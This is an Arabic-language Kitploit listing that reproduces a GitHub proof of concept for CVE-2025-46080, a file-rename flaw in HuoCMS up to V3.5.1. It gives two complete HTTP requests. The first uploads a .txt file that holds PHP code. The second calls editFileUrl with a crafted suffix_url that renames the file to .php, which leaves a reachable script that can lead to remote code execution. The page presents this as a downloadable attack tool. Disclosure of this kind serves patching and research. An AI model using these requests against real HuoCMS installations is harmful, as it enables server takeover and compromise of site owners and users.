Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/yggcwhat/cve-2025-46080
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويبسوء التكوين
GitHubyggcwhat/cve-2025-46080

CVE-2025-46080

تفاصيل

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مؤلف الثغرة:

yggcwhat

النسخة المتأثرة:

Huocms

المورّد:

https://huocms.com/

عنوان الكود المصدري:

https://gitee.com/digital-flag/huocms

ملف الثغرة:

AttachmentController.php

النسخة المتأثرة:

HuoCMS - <=V3.5.1

الوصف:

لاحقة $newPathUrl في دالة "copy" المستدعاة في طريقة "editFileUrl" لا يتم التحقق منها بواسطة القائمة البيضاء، مما يمكن استغلاله لتعديل اسم الملف. اللاحقة يتم التحكم فيها عبر suffix_url المرسل وهي قابلة للتحكم.

image

الخطوة 1: قم برفع ملف بلاحقة مسموحة (القائمة البيضاء) يحتوي على محتوى ضار مسبقًا، وسجل معرف الملف في نفس الوقت.

root@kitploit:~
POST /attachment/uploadAndSave HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization:  token
Content-Type: multipart/form-data; boundary=----geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Length: 581
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php/Index/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="type"

2
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="attachment_cate_id"

0
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="reduce_img"


------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

<?php
echo "hello word!"
?>
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9--
تنزيل الأداة

image

بناءً على المحتوى، تم تحديد المعرف على أنه 67.

الخطوة 2: ثم قم ببناء طلب استنادًا إلى editFileUrl، وأعد تسمية الملف ذي المعرف 67، حيث يتم استدعاء دالة copy في editFileUrl الثغرة لإعادة تسمية الملف بلاحقة غير قانونية.

root@kitploit:~
POST /attachment/editFileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: token
Content-Length: 83
Origin: http://127.0.0.1
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

id=67&name=test&prefix_url=&suffix_url=file/20250416/test.php&description=123123123

image

ملاحظة: لتعديله مرة أخرى، تحتاج إلى تغيير اسم ملف suffix_url لتجاوز دالة copy التي يتم تشغيلها بواسطة $oldPathUrl != $newPathUrl داخل editFileUrl.

رابط الوصول: http://127.0.0.1/storage/file/20250416/test.php

image

المراجع:

http://huocms.com https://github.com/yggcwhat/CVE-2025-46080/edit/main/README.md https://www.huocms.com/